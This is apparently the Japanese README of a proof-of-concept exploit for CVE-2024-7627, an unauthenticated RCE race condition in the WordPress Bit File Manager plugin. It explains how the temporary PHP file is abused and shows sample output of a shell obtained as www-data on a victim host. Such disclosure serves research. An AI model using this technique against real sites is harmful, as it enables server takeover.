
PoC CVE-2024-7627
このリポジトリには、WordPress プラグイン Bit File Manager(バージョン 6.0 – 6.5.5)における重大な**認証なしリモートコード実行(RCE)**脆弱性である CVE-2024-7627 用の概念実証(PoC)エクスプロイトが含まれています。
**Guest User Read(ゲストユーザー読み取り)**機能が有効な場合、このプラグインは checkSyntax 関数内でレースコンディションを露呈します。
この関数は検証前に一時的な PHP ファイルを /wp-content/uploads/ に書き込むため、攻撃者はそのファイルをリクエストして任意のシステムコマンドを実行できます。
requests, aiohttp, asyncio, beautifulsoup4依存関係をインストール:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data